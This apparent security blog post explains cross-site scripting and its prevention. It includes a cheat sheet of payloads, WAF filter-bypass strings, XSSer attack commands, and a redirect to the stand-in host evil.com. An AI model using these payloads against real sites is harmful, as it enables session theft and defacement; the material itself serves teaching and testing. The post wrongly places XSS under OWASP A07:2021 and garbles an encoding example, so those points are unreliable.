🔍 What is Cross-Site Scripting (XSS)?
Cross-Site Scripting (XSS) is a web vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. These scripts are typically written in JavaScript and can steal cookies, hijack sessions, redirect users, or deface websites.
XSS remains one of the most prevalent vulnerabilities, consistently appearing in the OWASP Top 10 under A07:2021 – Identification and Authentication Failures.
🧠 How Does XSS Work?
When a web application fails to properly sanitize user input, it may inadvertently include that input in the HTML output. An attacker can exploit this by injecting a malicious script:
Example:
<script>alert('XSS');</script>
If this input is stored or reflected back to the user without validation, the browser will execute it.
📚 Types of Cross-Site Scripting
1. Stored XSS (Persistent)
The malicious script is stored in the web app’s database and served to users whenever they access affected content.
Example: Posting <script>document.location='http://evil.com'</script> in a comment section.
2. Reflected XSS (Non-Persistent)
The payload is reflected in the response immediately—usually via query parameters or forms.
Example:
http://example.com/search?q=<script>stealCookies()</script>
3. DOM-Based XSS
The vulnerability lies entirely on the client side (JavaScript modifies the DOM based on untrusted input).
Editdocument.write(location.hash);
If an attacker sends #<script>attack()</script>, the script gets executed.
🎯 Real-World Impact
- Yahoo XSS (2013): Stored XSS in email service exploited to steal accounts.
- eBay (2017): Reflected XSS flaws used in phishing campaigns.
- British Airways (2018): Magecart used XSS to implant card skimmers — resulting in GDPR fines.
XSS is often a launchpad for broader attacks like CSRF, phishing, and privilege escalation.
🔎 XSS Detection Techniques
Manual Testing
- Use payloads like:
"><script>alert(1)</script>
"><img src=x onerror=alert(1)>
Tools for Detection
- Burp Suite
- XSSer
- ZAP Proxy
- [Acunetix / Netsparker] – for automated scans
🛡️ How to Prevent XSS
✅ Input Validation
- Whitelist allowed characters
- Reject special characters (
<, >, ', ")
✅ Output Encoding
✅ Use Content Security Policy (CSP)
- Encode dynamic content before rendering (e.g.,
&to&)
Content-Security-Policy: script-src 'self'
Helps prevent execution of untrusted scripts.
✅ Framework Security Features
- Use React/Vue with built-in XSS protection
- Avoid
innerHTML,document.write
✅ Sanitize HTML
Libraries like:
- DOMPurify (JavaScript)
- bleach (Python)
⚔️ XSS Exploitation Cheat Sheet
🔹 Common Manual Payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<math><mtext></mtext><script>alert(1)</script>
🔹 Event-Based Payloads
<body onload=alert('XSS')>
<div onclick=alert('XSS')>Click me</div>
<a href="javascript:alert(1)">XSS</a>
<input autofocus onfocus=alert(1)>
🧰 Tool-Based Testing (Using XSSer)
Basic URL Test
xsser --url "http://target.com/page.php?input=test"
Test POST Parameter
xsser -u "http://target.com/form" --data="search=test"
Auto-Detect & Attack
xsser --url "http://target.com/page.php?q=test" --auto
Use a Specific Payload
xsser --url "http://target.com/page.php?q=test" --payload="<img src=x onerror=alert(1)>"
⚠️ Bypass Filters (WAF/XSS Filters)
<scr<script>ipt>alert(1)</scr<script>ipt>
<scri%00pt>alert(1)</scri%00pt>
<scr<script>alert&lpar;1&rpar;</script>
🛡️ Testing Tips
Try in different contexts: HTML, attributes, script blocks, and inline handlers
- Always test for DOM-based XSS (e.g.,
location.hash,document.URL) - Combine XSS with CSRF, Clickjacking, or Open Redirects for advanced attacks
- Use browser dev tools to inspect how scripts are reflected and executed
🔄 Related HackerVault Posts
- 🔐 SQL Injection Explained: How Attackers Hack Your Queries
- 🧪 Malware Analysis: Understanding Code Execution
- 🛡️ Defensive Security: Building Your First Line of Defense
🔗 External Resources
🧩 Conclusion
Cross-Site Scripting (XSS) is not a relic of early web vulnerabilities—it’s alive and evolving. From persistent database injections to modern DOM attacks, XSS continues to challenge developers and defenders alike.
Understanding XSS in depth is essential for securing modern web applications and protecting user trust. Preventing XSS starts with clean code, strong validation, and a zero-trust mindset.
